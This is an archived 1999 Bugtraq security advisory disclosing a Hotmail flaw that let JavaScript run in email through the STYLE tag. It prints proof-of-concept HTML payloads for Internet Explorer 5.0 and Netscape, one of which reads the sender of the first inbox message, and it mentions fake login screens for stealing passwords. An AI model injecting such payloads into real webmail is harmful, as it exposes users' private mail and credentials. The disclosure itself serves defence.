Return-Path: owner-bugtraq@SECURITYFOCUS.COM
X-Mailer: Mozilla 4.61 [en] (Win95; I)
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID:  <37DCF0FE.908E4B4F@nat.bg>
Date:         Mon, 13 Sep 1999 15:41:34 +0300
Reply-To: Georgi Guninski <joro@NAT.BG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Georgi Guninski <joro@NAT.BG>
Subject:      Hotmail security vulnerability - injecting JavaScript using
              <STYLE> tag
X-To:         Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

There is a major security flaw in Hotmail which allows injecting and
executing
JavaScript code in an email message using the <STYLE> tag.
The vulnerability is present if the user uses Internet Explrer 5.0 or
Netscape Communicator 4.x (though the exploit is different).
Executing JavaScript when the user opens Hotmail email message allows
for example
displaying a fake login screen where the user enters his password which
is then stolen.
I don't want to make a scary demonstration, but I am pretty sure it is
also possible to read user's messages, to send messages from user's name
and doing other mischief.
Hotmail deliberately escapes all JavaScript (it can escape) to prevent
such attacks, but obviously there are holes.
It is much easier to exploit these vulnerabilities if the user uses
Internet Explorer 5.0.
Note: This is not a browser problem, it is Hotmail's problem.

Workaround: Disable JavaScript

The code that must be embeded in a HTML email message is:
For IE 5.0:

<P STYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" >

For Netscape Communicator:

<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from:
\'+a.document.links[26].text)',20000);
</STYLE>

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Regards,
Georgi Guninski
http://www.nat.bg/~joro